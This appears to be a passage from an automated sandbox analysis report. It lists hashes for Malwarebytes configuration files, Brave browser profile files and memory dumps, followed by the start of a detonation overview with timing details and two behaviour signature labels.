| SHA256 | cee9d615500c71a32a02fb548c970c06dc1fc90d754236ab9b60bb310a4ea8a5 |
| SHA512 | 8c21c5eefa92507cadb696a31a640bbea6ae05c4bcb8cad7d6dd0570a5d2671170b834a6ba5583f372ef260dd7b0c0931012aa4b6e5531585ab8241afb3e5475 |
C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json
| MD5 | 94bb8f5bf22af6c65c73855cf6438764 |
| SHA1 | a43b132c2307bb270ee4ed1231c330f758bf86e1 |
| SHA256 | 4fccb5355c44d55f4d6c6950cc8e626ca0b59ac9e595df26274b01901e2820a8 |
| SHA512 | faad489fcd228d42ec8dd68c70f0de9dd22a545becba4251a31bbd44be4e1103025c958078ac62f157378efe1c0cd05d07f5b19767452b812bb35c6b0af15ee1 |
C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json
| MD5 | 983993fa7b0e941178d64d0e39298d12 |
| SHA1 | 08e68f01fd65e23cbb34f22c60233799b2f481dd |
| SHA256 | 3731da03c2545fd32c52664ab46c01a96d029f2b6d62831a6177d3ea2f986567 |
| SHA512 | ec955973124b122ff67c89562597f09d43fc14b0d2e89bafbef7401ff272b4b9c8155f2b70ccb31978fcde5a539f70ebd3482056f77081445290bad599d4539a |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | 859838e6c4c15f06eb63e85e662959f0 |
| SHA1 | 51317141f9884819fbd2a49025d959a268929306 |
| SHA256 | 1b3c41f7049ecc1799638b2847fc7a7bf30c5a88633c28d7a93ef0b637a52c1b |
| SHA512 | 1fa82ff8bd6f9f5c0cb49e9a0df9fc1530a27b3396e0e203844e96f084e46b180c9dd0e4363daf08ccfd2c41c08ace6c5f4ca9f19ece456fce6e745cec8a93ba |
memory/8100-8937-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8939-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8938-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8944-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8945-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8943-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8947-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8948-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8946-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
memory/8100-8949-0x000001E227CC0000-0x000001E227CC1000-memory.dmp
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | 477338ac640bb3737bae5d872a660178 |
| SHA1 | edca67cb2548f985f6579a7735bd6d9ba9438476 |
| SHA256 | b8120ac2009add2f3a2f8571061c11b81066351e3e43004b99bc20d05c000044 |
| SHA512 | 634d884ef4b71c7970b600f8c92f56bcfabf932c0ac2a2ea99b4b7bfd4383674dd41cfce2c478286b60d4a7ced57c6aefc1dfbac6861e371cd13e84dfd5a76f3 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | e657a125e1bcec5add5c05fea4052a34 |
| SHA1 | fcdaa1bae36c01a1120664d85b94964d1b734b6c |
| SHA256 | 9d5fc29e04b7b9d25039bd2b8d06927db4513cd386080624024e07626cb5dd32 |
| SHA512 | 1f6b51eba85a8d98d56041985a494121ad3a6ccb179424a818f24040559cac585dbc4793c2b632bcb24db19f4f9770cf98ab6f3de92bba913d5aea925e0e9e67 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | b62c3b75fdb582521ca2efb4700ddfe2 |
| SHA1 | ceae7be42daad64f6f4e52b718b89fdf82b2b274 |
| SHA256 | 79a363fc9689e555771c2d0059df02439f0548cc4cb2ae65e10903e15c6ec24c |
| SHA512 | a890aedd9a0435abddec156c68d1c5d50d9dd8af49d5599a70db31fa123f19e79ececb876d7729a7c8e0cb6510bd364b3dcb8b5afc51eafaf909d8ffb8d3b36a |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | 7168e5ddf7cf33be496e6b377dfa80bc |
| SHA1 | 386d2b8df123cba27ab0d08cf3343a677bf7e6b7 |
| SHA256 | 0ac28acf191f4c44231403fe681b7cd8778f620e74c7027f0a9e9c0f64de27ca |
| SHA512 | c0e7de314a200be0593185bc2757423cb08bf25ca61658cffd647b3002f548ef795a9bb0dba812a977e532a5441ab16920558364ea042e84af61155f3571f436 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | f1728574a5c8955b836fb54c5c00bea3 |
| SHA1 | 347d071ba1a801194350be050b35406ecd3efbbb |
| SHA256 | bc73133902846a23f524fdaa975be5bbcd9e710fbe1bbe3d30d8543885e9ddcf |
| SHA512 | d8f855cfaa8a83788d309c6cc266aa471ec9bd96d9bfc1bb36050b5b86a7179036c6b4ac1ee5b04802fde490ceaef475ec62e2451052979bc58c9ed5e119c58c |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | 8eda61116655ccc9c0dc642f28982621 |
| SHA1 | 5f9188a9134f1f1471f62405f636c6a66c9058e7 |
| SHA256 | d85e63b2d70eb011c8d5f6ba918f5a34872d6a6f5849be7701d0aa5155d980a9 |
| SHA512 | 59d2e73f9216f232e4648363bb3ef211abbc51de6afd1cf6ddd840ec343fb2b1a0f75e6d605377cbfca72b7930e7cd571203078159026792005ed5de3b3c3501 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | 0023145d20fbdbe6bd08819530c682b7 |
| SHA1 | 68ccd5927807727b635635a40f7fc35c233d28e0 |
| SHA256 | b56e52cdedaf400c6bef2d1a60eb065d472bba3cd31b8ac68716c3a2ec93e414 |
| SHA512 | c67b15db6f8799cfac09c001199088e8562723b6a239f2d80705c58d4a4ba822386b99a027920ed2e44f38b9d99ce61bf6b36bea798347b18165b9038ddd8aa6 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6f09fa6c5860887f73994f0316e44ebd |
| SHA1 | d56ad4da4bc46ecbf5f0e73cc2061b61693ea356 |
| SHA256 | 60e8df0a104688253177c758a48a3bb97d995a5b12ff1f412dde3a019e1f07aa |
| SHA512 | cc7bd713ea1f4fbff18b32ba52f0332baa5570ac13456a757744f7b9a107e587ffbc465224716572bcc68f02a660aedb6a54f34cd5c889b4a320eed2672b879e |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 6108d9d9bb50fdd2466414a637b890b3 |
| SHA1 | dfcf3932f1bfb815dcc681fd330a463f60bb3fd7 |
| SHA256 | b080dacd7d5237d551030872a260cf79f0eb361dbe2364cd51223cade01e16f1 |
| SHA512 | 76f2fd03fcaeb444c1e9e6e803dba379815c16d4c33f9a5dbe56dd1caa1be4cf1031e47373044ffd7576e5f1d2840adb10be18db6a13cf149432d334fe092b89 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | 3469d5bad27ac4a77a606012f7b8c7ae |
| SHA1 | d1aff8a09afef219e46fb8cf22bf6bbc42d69586 |
| SHA256 | 90498d4bdb753730dd1a54872fbdcd4f005a944b31a26066f6418ed482c81921 |
| SHA512 | 88ab911a2d5df8227326e9f1a48aed44d843343a793266528b2c31fa7d345a5f469dd720a17114b408fe984658276e7f896055aacc0e110285d3479d660741ec |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | 855c3eed90076b3328cba0f5d43f7f99 |
| SHA1 | a939dc8ee48c157b32ba1ba53f568801a22986b4 |
| SHA256 | f196bf09a557e1820971e6f41ee957917ee3d92ee84f2c8f36e6c652a6da9bcc |
| SHA512 | ee67a8f471aed73ffec360112f7bbe335ed0dc2a23baad069de775c7ca2031212b678efdf98334f3a1e74de2513cc9cfa652a05d05c01f4e3dff6d8e1e3f6073 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | d384d3a53612f60fbbbc4099a4ae0e64 |
| SHA1 | 6ed0505b603e2a2c088d8f71cb3e15e45b61f0f3 |
| SHA256 | 6032bd0e9f6786207dce6f552dcc3334cc835d6812cfb0a3dbca19e4f5d34f46 |
| SHA512 | e3c0ec97fa7a38d60fcfecd335d44202385028a50c5559bf9c24c370e31d8a04daf45a037b4051b3d3db68721fb4ec3e09572030bdedfafe3aff34311129df22 |
C:\ProgramData\Malwarebytes\MBAMService\updatrpkg\SdkDbUpdatrV5.dll
| MD5 | 5c4b6998682070ad73cd246eae251ccb |
| SHA1 | d4e3eef6332a6598e5d63741f3407574c7de5f5b |
| SHA256 | 54e0e90cc5cfef91ceab363c6cad54c7190cfbbecf6353181779938a3f8de8a1 |
| SHA512 | e1f844ecb631b628ff37068ef474b070e22c5be6453c77acde53e886b7e9109f22d09748a7902e64237f5cc9d05818080c0bb5697918235ea2d4ceefb68b8524 |
C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json
| MD5 | cfbb22dccd1f1494d4d26d0c1c01f0f6 |
| SHA1 | fc731925fa718c400c61409b7b27d6f019eacf13 |
| SHA256 | c2604f5850e7b6b8994bd6f69c7c4e1bde2ea557ec0378a7ef978fddb03b204d |
| SHA512 | e5a844a323ebcf014486303b3327250870428ddcc8cc0992ca807c1a8981dc07d518726d85daa227a1a4792578154ffbb4d0002851f1abeca9dddc3860c16714 |
C:\ProgramData\Malwarebytes\MBAMService\updatrpkg\mbupdatrV5.exe
| MD5 | ab258c2dec1945b65cd09b302652e8d5 |
| SHA1 | 90e660cd3502d9bde40227ec0c0c2820958bab3c |
| SHA256 | c488c36827fc5505fc797e4d7f9bc56c2c2ab9d8c432ff9eb55657179bbe5e36 |
| SHA512 | de9e9d01f7cfe40fb64ff4e9ca83ae8f7a87b2e460d89b1fd6717f007afbaffb8cd4dd34e13352c46bbc00372c3ff7f9d9027f54df44f2fba16bd0dda4cfe7fc |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | bd451056b75cb216e73a4e8a7e8767e7 |
| SHA1 | 55534f5e69049ff39464bdfe5d427b903c5f3ee2 |
| SHA256 | c97eb3c24c66d14d13408b45c295990994b78134dbad4e518547584f95ef8353 |
| SHA512 | bc314fe4d9bb251fa603a0b6f36c35ff17e241229d9b022d10ca75576e3d1ddccf35ca8d0ff12c504940b2a4a78e6bab02b8cb538c4d3ac1ccc57dc53787cb8e |
C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json
| MD5 | 2a6f5614480fbb59daf21aee7f3bb700 |
| SHA1 | 0b702890f8020988d9e1dd166f15ce7f65e7f9dc |
| SHA256 | 852b8a8b3502e4d0c4559e2dfe1ff7d56d79d7060c7f9059652c94bf3c205041 |
| SHA512 | 933d5ef42a2a60d7158c1ec208c6f63fc08d657254d57eecb67026dd3046426fb4461ff67444a7a03021c18b64eea523670ced93d325337a857e5b77ef2ba9bc |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 4f746f50bd82ad0764b3b6028a913027 |
| SHA1 | 0aa179110c9d7bed1c2009da2a94162fce0a45cb |
| SHA256 | 96f3f4c6a28a658df12385fa064dba3e1885350f217f0bcafd2e4f4901bd5ec8 |
| SHA512 | 16b8d4518b44101295b55a4e177ddd1549b6ed20ca3b818d25ae2a75b8ea4fdd6d54bc1acbbc5e6af209718d924cbad16d19206f44a86bef982eb7796c1ae3bf |
C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json
| MD5 | 89c55256fb4b126e881c5c03902f97a7 |
| SHA1 | 2fc8c7547ce5950f11d52c68baf2b12766be3935 |
| SHA256 | bbad4b288ed78c735a5ad60e971fecf1d62147b4e7b326bbaf474304f536af17 |
| SHA512 | 84c032036cdb3470ac953ca639d16ec227f8dadfbc319a9ea04d18fc180b83a85754111ef1d3652ac0f461fe0332642cb6336ad74c6db960c7dddc0aaa7f7d55 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | 2b08787262cfef0a76ffe1c94742fc24 |
| SHA1 | 13c133e0dceb688c63cd77e3a0bd0aa77be7b305 |
| SHA256 | 4cf335a03881adf353f1c9950989c4196db5ad9cccea3e865a712dabeeffee87 |
| SHA512 | 8e8d24638be00d31e51dd09730c5c330e4b266e5e3ba5bfa17157ce485de0a9131e47c0365c2f58ba6e79510ffbf7d95559483cb6ed212ee3978fa2798fabdf6 |
C:\Program Files\Malwarebytes\Anti-Malware\mbamsi64.dll
| MD5 | 3bc4d2bb173c005c678da34697c17d99 |
| SHA1 | 2e07b4f3af7dc82d8f7a5fdc920578f6e908a0cf |
| SHA256 | fbcfade08f8d2617b6e9f2e279f81ce3b5e1fc0cce5bcfd927cde1335114f6da |
| SHA512 | 36864cef0ba96899d1c9ce088ae931b10461f1360a21fe8791b61acbd6ff1b30786a0f6745eac6acbdcfbcd3f05347aa1aa05fdaaf9e36e8fd0da3768ae78a17 |
C:\Windows\System32\drivers\MbamChameleon.sys
| MD5 | 2a0bea88ce233b8d841d56df26195e06 |
| SHA1 | 889af4a1f2b77423d5557c8ba7980e5d25e74647 |
| SHA256 | 6116b30ab6f4bf5f0e8eca78bc67890e7aacc6c74fbb4a15a93af44bb34f2636 |
| SHA512 | c3d2620e3e1c19b63bacd578cbe55d52242dd01fc3ba5a90d0d001f8cab105a123959f0b18a8e6e71b4dc97d7995e832c8cd2d3693d808c8a81c98499cc63fd2 |
C:\Windows\Temp\tmp6056aaaaaa
| MD5 | 39949f6b581e7e7d0cc68316814f203c |
| SHA1 | 1bfaf4a50b78dc11873880dad864087f3d791b35 |
| SHA256 | c17f0ba6b1520462d0ced872247b29787ed8093288832576b5654efe6039477f |
| SHA512 | 3e0f283fd27dd1cbf103297761f05a680a741a74caf00f5abe78d7eb66cda554f29c8e7e24419cacefe848b35d02268271d5a5f39e31e5cc6a3ceff85b0037fd |
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9EC3B71635F8BA3FC68DE181A104A0EF_10CFC0D4C45D2E76B7EA49C8C22BEDFE
| MD5 | 5bfa51f3a417b98e7443eca90fc94703 |
| SHA1 | 8c015d80b8a23f780bdd215dc842b0f5551f63bd |
| SHA256 | bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128 |
| SHA512 | 4cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399 |
C:\ProgramData\Malwarebytes\MBAMService\updatrpkg\expapply64.dll
| MD5 | 99c8e47d747b36be8ffcfdd29b80dc3d |
| SHA1 | 9b8e87563fee31abf90bded22241f444b947b071 |
| SHA256 | 0db4dcdf3fbeef2c4d18555f479a28dde3d67ee6f0d27c18925207142b7a38f7 |
| SHA512 | f9cf4ec06585c6cde57011884141782bde83adf186f57f75576c8dade1e868d6b886daf8fa15c55ac908ff995c4b6323c3a8266dbd664b807cd67cf788f7074e |
C:\ProgramData\Malwarebytes\MBAMService\lkg_db\version.dat
| MD5 | d4838f8fd45733aa1bccbe43e779c5c4 |
| SHA1 | 4431b01aa75cdacd51364e93a0d0e672b1aab912 |
| SHA256 | 31611fc02398bb839562e57e4854d15b806a20b37973a18e4eb008da15de6ea0 |
| SHA512 | 904827c77619a6c8e7368979ba958ef7785fec80c24be9bcdbcc5a8ce37035b9d52a1072ae0072e1b94c9027d298a671bd139dc438647b271ba20916e7e6e3d8 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | 358f702e40638f39ffd9c61f5c588642 |
| SHA1 | a2831356ca154afb90e76386d4f88df3ad83e4e1 |
| SHA256 | d5cd3d93302cc88e3354a9941d40d497ef9b5ce34ebe88d5d4fc3a966eb42025 |
| SHA512 | 39b70e5da84226c8120577ceea4732eb7bde60ec78353e15cc649b929b87fac619874c0425880eba666091b42be1f0efbc733b83f974ea343f4e9ab35ac79800 |
C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D16.tmp
| MD5 | 699dd61122d91e80abdfcc396ce0ec10 |
| SHA1 | 7b23a6562e78e1d4be2a16fc7044bdcea724855e |
| SHA256 | f843cd00d9aff9a902dd7c98d6137639a10bd84904d81a085c28a3b29f8223c1 |
| SHA512 | 2517e52f7f03580afd8f928c767d264033a191e831a78eed454ea35c9514c0f0df127f49a306088d766908af7880f713f5009c31ce6b0b1e4d0b67e49447bfff |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | 6c36f0016b50a7e6fa9b028617a97ae9 |
| SHA1 | 8a241337bdc3657e47c005d4a0381212a4295403 |
| SHA256 | 29c3ea7776b3cf5df4005c5458946329ceb2063077a47415cecb9c180fd73f63 |
| SHA512 | 1ecffd0734ce2d6c4616f9f3f092ac0927a3e2930ba2d4cf621b71f3819e37fbf123323b5eb4ef4468673d242552411c2d9c6275ee3a32b25052a2e82b47130a |
C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D22.tmp
| MD5 | 3b337c2d41069b0a1e43e30f891c3813 |
| SHA1 | ebee2827b5cb153cbbb51c9718da1549fa80fc5c |
| SHA256 | c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7 |
| SHA512 | fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 26d5f49d66cd5a32a2c9c6e83e709cbb |
| SHA1 | 534c450d554feb7501edd4b24b9cb162013be3c2 |
| SHA256 | dee15eeefe9a7b4c7d570380286b7078d9613487043a20d179ceead9dd6e081c |
| SHA512 | 8c16a65334b5d1365a13159737a3c08158fef20569bcc4d974fd17843a0270484f9d71e9fbe7f7b1f64cd6b30f024fc0604b8464a091038e1f0a2b69eae80e4a |
C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D2A.tmp
| MD5 | a7b7470c347f84365ffe1b2072b4f95c |
| SHA1 | 57a96f6fb326ba65b7f7016242132b3f9464c7a3 |
| SHA256 | af7b99be1b8770c0e4d18e43b04e81d11bdeb667fa6b07ade7a88f4c5676bf9a |
| SHA512 | 83391a219631f750499fd9642d59ec80fb377c378997b302d10762e83325551bb97c1086b181fff0521b1ca933e518eab71a44a3578a23691f215ebb1dce463d |
C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D29.tmp
| MD5 | b5d0f85e7c820db76ef2f4535552f03c |
| SHA1 | 91eff42f542175a41549bc966e9b249b65743951 |
| SHA256 | 3d6d6e7a6f4729a7a416165beabda8a281afff082ebb538df29e8f03e1a4741c |
| SHA512 | 5246ebeaf84a0486ff5adb2083f60465fc68393d50af05d17f704d08229ce948860018cbe880c40d5700154c3e61fc735c451044f85e03d78568d60de80752f7 |
C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D2C.tmp
| MD5 | 804b9539f7be4ece92993dc95c8486f5 |
| SHA1 | ec3ca8f8d3cd2f68f676ad831f3f736d9c64895c |
| SHA256 | 76d0da51c2ed6ce4de34f0f703af564cbefd54766572a36b5a45494a88479e0b |
| SHA512 | 146c3b2a0416ac19b29a281e3fc3a9c4c5d6bdfc45444c2619f8f91beb0bdd615b26d5bd73f0537a4158f81b5eb3b9b4605b3e2000425f38eeeb94aa8b1a49f2 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\Network Persistent State
| MD5 | dd1668927d7bf2ab4927d129a01b675e |
| SHA1 | 0c0c77dd9c68c38ce61ce20a956954dbb83f4cc9 |
| SHA256 | dfc9908dbae3964cf95ea2c30b30a32ae238af31e371f4db0d504aed7bda75e7 |
| SHA512 | 69431128f58d61c0e5bca1d3f06411ed590c36494a95146f58e428c40841dd70ef2a9572f8b5578b166e989d41b78b5c2fd0133b802e9dc61c85237a89336b3c |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | baf2c209e35ca6ecc1eb55503843777e |
| SHA1 | fb453ceaa83537102c73d01b37a741be2f5fc7d9 |
| SHA256 | 0dfdbfc697691d1160ec1e33c98f6077d7c6f88f3563c8e8dc8445b13eaf5b26 |
| SHA512 | 65872212f016732c750487c24b044e56dcfd9d1d1f446fafc9922290ebff2c7f675a931fac398e9fd213da6eaf84c19f832df9ba002abc9d0572a4ae17f1e76c |
C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\D59.tmp
| MD5 | 607039b9e741f29a5996d255ae7ea39f |
| SHA1 | 9ea6ef007bee59e05dd9dd994da2a56a8675a021 |
| SHA256 | be81804da3077e93880b506e3f3061403ce6bf9ce50b9c0fcc63bb50b4352369 |
| SHA512 | 0766c98228f6ccc907674e3b9cebe64eee234138b8d3f00848433388ad609fa38d17a961227e683e92241b163aa30cf06708a458f2bc4d3704d5aa7a7182ca50 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | 687da65397a0575bdc27c5cb3cc7505b |
| SHA1 | 922fc65f2a6c649cc863336d99006c5ad2a382bb |
| SHA256 | 76a6f719dc2399de7207b38ff1fb3c7c39a310562cae9562c155d81372a7ef07 |
| SHA512 | 00160a9f617c1f4f8d738f72b03827077142431785cfe12a491baf3bc7e1e268fcc8deaeb39f5376286b1ac39a4d3a353655fe6e997104fb715fce128d381b03 |
C:\ProgramData\Malwarebytes\MBAMService\dds_tmp\DD9.tmp
| MD5 | 54dde63178e5f043852e1c1b5cde0c4b |
| SHA1 | a4b6b1d4e265bd2b2693fbd9e75a2fc35078e9bd |
| SHA256 | f95a10c990529409e7abbc9b9ca64e87728dd75008161537d58117cbc0e80f9d |
| SHA512 | 995d33b9a1b4d25cd183925031cffa7a64e0a1bcd3eb65ae9b7e65e87033cd790be48cd927e6fa56e7c5e7e70f524dccc665beddb51c004101e3d4d9d7874b45 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 9cf3a5d1156c2cb4349587ddab394515 |
| SHA1 | 8a2d3e137688c9a908b5efe142c57a1db46513ad |
| SHA256 | 8a1336f38e7f9d77d93061484474349520ce7638d4c126e9bb5ab58b32628a45 |
| SHA512 | 0b24d8ea3277974ee37ee8c8177cf1dd25b053cca93d943b719b311f109afb9c38b716f19829294bb0bda3ecbe3e1742242966ec5210b72565bf51b18c655b21 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State
| MD5 | 6cd9a85ddc84cc35a698b5b603ed5622 |
| SHA1 | 07bf47c776add59180895d928ab81ea21cf40f88 |
| SHA256 | 54a15159be168bd096f45be4361b032e1292a03fbb40bbd8ee3c8643fa971dd0 |
| SHA512 | 76d84302f4040bff8c5eb4a1b5342a7a1d3151b438e57565e8477d31b24f696e7dcaf46f66573ca636977ad6e7a1dc8ca644c2a85ae084ce0e003c82dde78355 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | b78afd53bdf64e26434eeff62aba88fd |
| SHA1 | cd79acf844fb470d708d82a09201408b53a17096 |
| SHA256 | 030815620fc80b67b1e3a5f58adbfbfc4e5485af79a4dcedcd21a30add2246d8 |
| SHA512 | caa467c533b0e6c5ff784da86ef85ab2245c8729f57d0387823c4cf0d57f4be8ad63f03d859b12fb745c812e292e65760580cdd5e255b6ae30db1d858630dce4 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | ea3401d59353a6a199f73dfcfd1a20e4 |
| SHA1 | 9b3d2dd1d773da72f69f46d65793ecc1ab2e990b |
| SHA256 | 187ee465fc91862a957dc3962a367a2194c8acaabcaadc1ad87deb3e49e77b82 |
| SHA512 | 9285e65309443095ba4343faa4c6beb305c1b8b2527efdc8b925d9b2a20eaab689a92442c01ebbf94fbd54b625d2fa4ccfb0e540196722b4e614662e09b3513b |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 63721fdf03d0d477c3fab7d6ae9c609f |
| SHA1 | 28e45122d1eb49ff25042c829f0932b2b695afc4 |
| SHA256 | 476ece59e0fdccdaf6d35841ba7587f5c619150d304bf5a7bf9310099bd01902 |
| SHA512 | 82f68f6fdf75b1485111e0e869875ac1c446ff3536ca294ffa649b3c9b36f24798d253746dba97a3bf0617264184df8f6e142ee38fc0bcf7793f3827be98f005 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | be8d115a4f76d4305d985fb0e6636c9b |
| SHA1 | fb7ca8c3708dba6755eca919c248362145b9f2d9 |
| SHA256 | d09947b947416c717cc24c377137c59e1e24bb3279fe5955d797055752f7ac7c |
| SHA512 | aa19c7a538047472709eadabee18e5df6bdf9f18ba2b5065c950ef535d0e26aac4b929808fe3b9db538b917e08df25d7e2a58d1259270748ea732dccce01b3b7 |
C:\Windows\System32\catroot2\dberr.txt
| MD5 | 458af7f613f88dfbc08709af5fb67162 |
| SHA1 | dcbdd6f130e4e80cec214d67ec4fb17e9478aa7c |
| SHA256 | f6e1dd5453673489d73dd0affaed27c1f3b833f22159670e5dbdbf387b9777bd |
| SHA512 | c6a6a88ef27eb98714738127fa746db317ac90b3b69792f99f13fb67e69316b7279026aa137475a1ca2eae10d3488bf25db48e5ea34084deaeb933ff8321fd31 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | c84c71a917cbf470e61d0d54a7899a4a |
| SHA1 | 1983ccc6d244722c29835acb0113ad21927318e5 |
| SHA256 | f0d284b532f14781340a80ab1d456bf68dab53cda656ab8ee4511d31bb37f55f |
| SHA512 | 10b674918c6c5fcc5f0b10c84c7a31e8a5364efe475f1b7610a072f52e86753ba281ef97b2b706d087a9eac8beefdbc8a0070a6e39a65913a8b162064caef029 |
C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json
| MD5 | 28bbccbb875378445d05cfd59b5ae3ba |
| SHA1 | 910aa53ee986ee937644d0188a92d9caa0c49f4b |
| SHA256 | b2baf928e047e4358d6a87415463f4d8a9ecc157f551cae435034ef6bf7f1418 |
| SHA512 | 4c0d1672f5de437640977c3d867651c896aaaabec44d33c76e3497c264d10f311b6ece4890c527332e1ffea3277b1617d172ed65e74ce1e9cedaa0a5c43af9d1 |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | a80095cd0fdc413fa2845954334f9ca7 |
| SHA1 | 927a93d071b018b47499e7c33d5dcf2843f5bfb8 |
| SHA256 | 47a26dbae546138e57c1d813abd2b668f2c40daea39e2629d52fb14f9401a4ad |
| SHA512 | e42cf0274b348204a468c1a39507cb1892d7fd9d607b464a69a73ec6e2a29bd011fee624676a85a5d559a245b2e8af7105f587d4ecac23a683e284ebbb40973b |
C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json
| MD5 | a3eeb87ef9ff8167c63e2d69ca1b0814 |
| SHA1 | 760044670a2d96aa6267601ab55654e99e91370f |
| SHA256 | fc48e5828b8cec9f2411cf2fb14f1a90bc00e5d9671e296b68d5c10a369c5e86 |
| SHA512 | 7dea7cf9d7e1e9a9b475b40fcf48bd39ec48084ddf81558b9b5cabfcd1449a7ab080d0c085885f1cc502736086052ef6a77d443ba0089f8d85c32622927cb22d |
C:\ProgramData\Malwarebytes\MBAMService\ScanResults\e0f495cc-2291-11ef-85dc-620c7149a6b2.json
| MD5 | a10c4f9c41cc431ca119e534cfe6314d |
| SHA1 | 5f7b6e50c55e23eaf3d7f547dac46a93f9ddb43d |
| SHA256 | e13e5b4fdcc047eb23dd6eab4b0bbd82b044706fca214e1fa9be655995927a97 |
| SHA512 | c1642ec62d59446fccdaca621078f80e10b53d057663f1fe627342dcfc1216e39d632d19b484ebb8cccf57c8be8df94df3810442d574c5fef6185c1d26906b9b |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | 094fc53e4c1e7171c8d0796dc42953a6 |
| SHA1 | 3b93fbc31ec337315007c1e3f1050adfcf07b0da |
| SHA256 | cad38e76c61cbcf19865be154a7e3088ac788d276d7640da62e7204241f51824 |
| SHA512 | 2c5f57bb1883c216607b328c08c3d20fab296dac021f46d15de850eb93ce2104daa9f2c127e228d759e96f2a53e964f48f5f2c9a1cd94fac32993d41cfcd6519 |
C:\Users\Admin\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\TransportSecurity
| MD5 | d0ab545b92f4cb4a35040ebeb68164ac |
| SHA1 | 521c6a425c3959774f7383065d5102f2eb70e090 |
| SHA256 | 9f4e83bb4a5239c8563c9cde08b9463b7dd0ba1e4bc4497b0af40406886bea0b |
| SHA512 | aa342b070c9e249deac5b9ded992bc8b103332a0f12e46a73eb156e2f345a3ebac92507b96914495dbcad31c2cff5568d066c701b8d9f1d7df4a5d90c225a9ae |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-04 16:33
Reported
2024-06-04 16:49
Platform
win10v2004-20240426-en
Max time kernel
443s
Max time network
452s
Command Line
Signatures
Loads dropped DLL
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
